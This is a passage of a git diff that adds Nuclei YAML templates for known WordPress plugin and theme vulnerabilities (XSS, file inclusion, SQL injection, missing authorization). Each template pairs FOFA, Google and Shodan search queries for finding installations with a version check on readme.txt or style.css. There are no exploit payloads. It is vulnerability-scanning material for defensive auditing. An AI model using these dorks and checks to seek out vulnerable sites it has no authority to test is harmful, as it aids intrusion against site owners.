+ Softtemplates For Elementor <= 1.0.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0db63414-b8c3-41bf-a6df-4b6113ea7388?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/softtemplates-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/softtemplates-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,softtemplates-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/softtemplates-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "softtemplates-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.8')
\ No newline at end of file
diff --git a/poc/other/soledad-29fa607193cd3b39b09ca02b2ce4f403.yaml b/poc/other/soledad-29fa607193cd3b39b09ca02b2ce4f403.yaml
new file mode 100644
index 0000000000..3c7ac28665
--- /dev/null
+++ b/poc/other/soledad-29fa607193cd3b39b09ca02b2ce4f403.yaml
@@ -0,0 +1,59 @@
+id: soledad-29fa607193cd3b39b09ca02b2ce4f403
+
+info:
+ name: >
+ Soledad <= 8.5.9 - Unauthenticated Limited Local File Inclusion
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/927674db-05f1-4f3b-8297-8a907955ea87?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/soledad/"
+ google-query: inurl:"/wp-content/themes/soledad/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,soledad,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/soledad/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "soledad"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 8.5.9')
\ No newline at end of file
diff --git a/poc/other/sparkle-elementor-kit-4c18bc0aa3ca26a81086e7ea47ef5b19.yaml b/poc/other/sparkle-elementor-kit-4c18bc0aa3ca26a81086e7ea47ef5b19.yaml
new file mode 100644
index 0000000000..26d182690a
--- /dev/null
+++ b/poc/other/sparkle-elementor-kit-4c18bc0aa3ca26a81086e7ea47ef5b19.yaml
@@ -0,0 +1,59 @@
+id: sparkle-elementor-kit-4c18bc0aa3ca26a81086e7ea47ef5b19
+
+info:
+ name: >
+ Sparkle Elementor Kit <= 2.0.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3557cd1e-cfb4-4f08-af3c-be5211a325c1?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/sparkle-elementor-kit/"
+ google-query: inurl:"/wp-content/plugins/sparkle-elementor-kit/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,sparkle-elementor-kit,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/sparkle-elementor-kit/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "sparkle-elementor-kit"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.9')
\ No newline at end of file
diff --git a/poc/other/splash-connector-a408956eb25c0fc5ebb6237dc9efaaab.yaml b/poc/other/splash-connector-a408956eb25c0fc5ebb6237dc9efaaab.yaml
new file mode 100644
index 0000000000..a31cef8c24
--- /dev/null
+++ b/poc/other/splash-connector-a408956eb25c0fc5ebb6237dc9efaaab.yaml
@@ -0,0 +1,59 @@
+id: splash-connector-a408956eb25c0fc5ebb6237dc9efaaab
+
+info:
+ name: >
+ Splash Sync <= 2.0.6 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5be1cfcf-26f1-47d8-a48c-d9f385eb031a?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/splash-connector/"
+ google-query: inurl:"/wp-content/plugins/splash-connector/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,splash-connector,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/splash-connector/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "splash-connector"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.6')
\ No newline at end of file
diff --git a/poc/other/sv100-companion-9407692ccefc1b1607863a7068a9481a.yaml b/poc/other/sv100-companion-9407692ccefc1b1607863a7068a9481a.yaml
new file mode 100644
index 0000000000..af57100f12
--- /dev/null
+++ b/poc/other/sv100-companion-9407692ccefc1b1607863a7068a9481a.yaml
@@ -0,0 +1,59 @@
+id: sv100-companion-9407692ccefc1b1607863a7068a9481a
+
+info:
+ name: >
+ SV100 Companion <= 2.0.02 - Missing Authorization to Unuathenticated Arbitrary Options Update
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c244eb33-acaf-460b-ae1d-6688b21cc60f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/sv100-companion/"
+ google-query: inurl:"/wp-content/plugins/sv100-companion/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,sv100-companion,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/sv100-companion/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "sv100-companion"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.02')
\ No newline at end of file
diff --git a/poc/other/swift-performance-lite-9d1b83ae9017d2fadd1702f8770861b6.yaml b/poc/other/swift-performance-lite-9d1b83ae9017d2fadd1702f8770861b6.yaml
new file mode 100644
index 0000000000..520c924944
--- /dev/null
+++ b/poc/other/swift-performance-lite-9d1b83ae9017d2fadd1702f8770861b6.yaml
@@ -0,0 +1,59 @@
+id: swift-performance-lite-9d1b83ae9017d2fadd1702f8770861b6
+
+info:
+ name: >
+ Swift Performance Lite <= 2.3.7.1 - Unauthenticated Local PHP File Inclusion via 'ajaxify'
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4921f41a-a9b1-4ae2-a903-c14ed22dcc15?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/swift-performance-lite/"
+ google-query: inurl:"/wp-content/plugins/swift-performance-lite/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,swift-performance-lite,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/swift-performance-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "swift-performance-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.3.7.1')
\ No newline at end of file
diff --git a/poc/other/twentytwenty-008f64526c3780ff8f14b386a2edcab8.yaml b/poc/other/twentytwenty-008f64526c3780ff8f14b386a2edcab8.yaml
new file mode 100644
index 0000000000..fc39063e3a
--- /dev/null
+++ b/poc/other/twentytwenty-008f64526c3780ff8f14b386a2edcab8.yaml
@@ -0,0 +1,59 @@
+id: twentytwenty-008f64526c3780ff8f14b386a2edcab8
+
+info:
+ name: >
+ TwentyTwenty <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9f805982-1141-4e28-b28c-93483646cf99?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/twentytwenty/"
+ google-query: inurl:"/wp-content/plugins/twentytwenty/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,twentytwenty,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/twentytwenty/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "twentytwenty"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/other/uber-grid-356fe3fbd1593fabd8654043fb4bf3f8.yaml b/poc/other/uber-grid-356fe3fbd1593fabd8654043fb4bf3f8.yaml
new file mode 100644
index 0000000000..a1860df96d
--- /dev/null
+++ b/poc/other/uber-grid-356fe3fbd1593fabd8654043fb4bf3f8.yaml
@@ -0,0 +1,59 @@
+id: uber-grid-356fe3fbd1593fabd8654043fb4bf3f8
+
+info:
+ name: >
+ WordPress Portfolio Builder – Portfolio Gallery <= 1.1.7 - Authenticated (Editor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f25626f3-d9a9-4aad-8f5f-45f72d0711e1?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/uber-grid/"
+ google-query: inurl:"/wp-content/plugins/uber-grid/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,uber-grid,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/uber-grid/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "uber-grid"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.7')
\ No newline at end of file
diff --git a/poc/other/ultimate-coming-soon-1b1151732f9e837b52353dea3817cd15.yaml b/poc/other/ultimate-coming-soon-1b1151732f9e837b52353dea3817cd15.yaml
new file mode 100644
index 0000000000..3bc842890d
--- /dev/null
+++ b/poc/other/ultimate-coming-soon-1b1151732f9e837b52353dea3817cd15.yaml
@@ -0,0 +1,59 @@
+id: ultimate-coming-soon-1b1151732f9e837b52353dea3817cd15
+
+info:
+ name: >
+ Ultimate Coming Soon & Maintenance <= 1.0.9 - Missing Authorization to Authenticated (Subscriber+) Template Name Update
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bef108a-2c68-4347-bf53-559b2d877f6b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-coming-soon/"
+ google-query: inurl:"/wp-content/plugins/ultimate-coming-soon/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,ultimate-coming-soon,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-coming-soon/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-coming-soon"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.9')
\ No newline at end of file
diff --git a/poc/other/ultimate-coming-soon-be5df66158fd08241f78579ea8d369cd.yaml b/poc/other/ultimate-coming-soon-be5df66158fd08241f78579ea8d369cd.yaml
new file mode 100644
index 0000000000..bbc280226c
--- /dev/null
+++ b/poc/other/ultimate-coming-soon-be5df66158fd08241f78579ea8d369cd.yaml
@@ -0,0 +1,59 @@
+id: ultimate-coming-soon-be5df66158fd08241f78579ea8d369cd
+
+info:
+ name: >
+ Ultimate Coming Soon & Maintenance <= 1.0.9 - Missing Authorization to Unauthenticated Template Activation
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a535eb7f-5ec7-4b3b-b46f-4f09434d04b6?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-coming-soon/"
+ google-query: inurl:"/wp-content/plugins/ultimate-coming-soon/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,ultimate-coming-soon,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-coming-soon/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-coming-soon"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.9')
\ No newline at end of file
diff --git a/poc/other/watu-690d8bcd0e263bad7d88f01f7c626e23.yaml b/poc/other/watu-690d8bcd0e263bad7d88f01f7c626e23.yaml
new file mode 100644
index 0000000000..980af8d721
--- /dev/null
+++ b/poc/other/watu-690d8bcd0e263bad7d88f01f7c626e23.yaml
@@ -0,0 +1,59 @@
+id: watu-690d8bcd0e263bad7d88f01f7c626e23
+
+info:
+ name: >
+ Watu Quiz <= 3.4.1.2 - Authenticated (Contributor+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d3aa8d64-a0d1-49ad-ad92-e2a2bf066fe1?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/watu/"
+ google-query: inurl:"/wp-content/plugins/watu/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,watu,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/watu/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "watu"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.4.1.2')
\ No newline at end of file
diff --git a/poc/other/wip-woocarousel-lite.yaml b/poc/other/wip-woocarousel-lite.yaml
new file mode 100644
index 0000000000..c4337b4d33
--- /dev/null
+++ b/poc/other/wip-woocarousel-lite.yaml
@@ -0,0 +1,59 @@
+id: wip-woocarousel-lite
+
+info:
+ name: >
+ WIP WooCarousel Lite <= 1.1.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/50721265-dbbf-4032-a8d6-9cf42a986c0d?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wip-woocarousel-lite/"
+ google-query: inurl:"/wp-content/plugins/wip-woocarousel-lite/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wip-woocarousel-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wip-woocarousel-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wip-woocarousel-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.6')
\ No newline at end of file
diff --git a/poc/other/woo-pdf-invoice-builder-b3d98dd124afa7dc460f57d96fd05347.yaml b/poc/other/woo-pdf-invoice-builder-b3d98dd124afa7dc460f57d96fd05347.yaml
new file mode 100644
index 0000000000..7761e007b1
--- /dev/null
+++ b/poc/other/woo-pdf-invoice-builder-b3d98dd124afa7dc460f57d96fd05347.yaml
@@ -0,0 +1,59 @@
+id: woo-pdf-invoice-builder-b3d98dd124afa7dc460f57d96fd05347
+
+info:
+ name: >
+ PDF Builder for WooCommerce. Create invoices,packing slips and more <= 1.2.136 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5f21a86b-52f4-4563-afce-32f1949ce5a1?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/woo-pdf-invoice-builder/"
+ google-query: inurl:"/wp-content/plugins/woo-pdf-invoice-builder/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,woo-pdf-invoice-builder,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woo-pdf-invoice-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woo-pdf-invoice-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.136')
\ No newline at end of file
diff --git a/poc/other/xl-tab-40f41253ca6b22bb907999b982dcace4.yaml b/poc/other/xl-tab-40f41253ca6b22bb907999b982dcace4.yaml
new file mode 100644
index 0000000000..7e54b8105c
--- /dev/null
+++ b/poc/other/xl-tab-40f41253ca6b22bb907999b982dcace4.yaml
@@ -0,0 +1,59 @@
+id: xl-tab-40f41253ca6b22bb907999b982dcace4
+
+info:
+ name: >
+ XLTab – Accordions and Tabs for Elementor Page Builder <= 1.4 - Authenticated (Contributor+) Post Disclosure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/dbf8c216-aedd-4db9-aaa4-61bc0d7850cb?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/xl-tab/"
+ google-query: inurl:"/wp-content/plugins/xl-tab/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,xl-tab,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/xl-tab/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "xl-tab"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4')
\ No newline at end of file
diff --git a/poc/other/yahoo-media-player-6d6ac328025439c4bf1dd52ca758d69c.yaml b/poc/other/yahoo-media-player-6d6ac328025439c4bf1dd52ca758d69c.yaml
new file mode 100644
index 0000000000..746e137af3
--- /dev/null
+++ b/poc/other/yahoo-media-player-6d6ac328025439c4bf1dd52ca758d69c.yaml
@@ -0,0 +1,59 @@
+id: yahoo-media-player-6d6ac328025439c4bf1dd52ca758d69c
+
+info:
+ name: >
+ Yahoo! WebPlayer <= 2.0.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5e043348-c0aa-418f-9120-dcf470f92123?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/yahoo-media-player/"
+ google-query: inurl:"/wp-content/plugins/yahoo-media-player/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,yahoo-media-player,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/yahoo-media-player/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "yahoo-media-player"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.6')
\ No newline at end of file
diff --git a/poc/other/znajdz-prace-z-pracapl-f64257e15582ca43c7ad0a549fe64fd8.yaml b/poc/other/znajdz-prace-z-pracapl-f64257e15582ca43c7ad0a549fe64fd8.yaml
new file mode 100644
index 0000000000..3708e5de59
--- /dev/null
+++ b/poc/other/znajdz-prace-z-pracapl-f64257e15582ca43c7ad0a549fe64fd8.yaml
@@ -0,0 +1,59 @@
+id: znajdz-prace-z-pracapl-f64257e15582ca43c7ad0a549fe64fd8
+
+info:
+ name: >
+ Znajdź Pracę z Praca.pl <= 2.2.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e618025-f631-48af-b360-e11524e61be3?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/znajdz-prace-z-pracapl/"
+ google-query: inurl:"/wp-content/plugins/znajdz-prace-z-pracapl/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,znajdz-prace-z-pracapl,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/znajdz-prace-z-pracapl/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "znajdz-prace-z-pracapl"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.3')
\ No newline at end of file
diff --git a/poc/remote_code_execution/accounting-for-woocommerce.yaml b/poc/remote_code_execution/accounting-for-woocommerce.yaml
new file mode 100644
index 0000000000..e737e22c78
--- /dev/null
+++ b/poc/remote_code_execution/accounting-for-woocommerce.yaml
@@ -0,0 +1,59 @@
+id: accounting-for-woocommerce
+
+info:
+ name: >
+ Accounting for WooCommerce <= 1.6.6 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f34b7518-5cb3-4b4e-8b18-927c08c045f7?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/accounting-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/accounting-for-woocommerce/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,accounting-for-woocommerce,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/accounting-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "accounting-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.6')
\ No newline at end of file
diff --git a/poc/remote_code_execution/multilevel-referral-plugin-for-woocommerce-20b3dc25777d2d4d55cfa2c7a3d7144f.yaml b/poc/remote_code_execution/multilevel-referral-plugin-for-woocommerce-20b3dc25777d2d4d55cfa2c7a3d7144f.yaml
new file mode 100644
index 0000000000..c1020de4cf
--- /dev/null
+++ b/poc/remote_code_execution/multilevel-referral-plugin-for-woocommerce-20b3dc25777d2d4d55cfa2c7a3d7144f.yaml
@@ -0,0 +1,59 @@
+id: multilevel-referral-plugin-for-woocommerce-20b3dc25777d2d4d55cfa2c7a3d7144f
+
+info:
+ name: >
+ Multilevel Referral Affiliate Plugin for WooCommerce <= 2.27 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
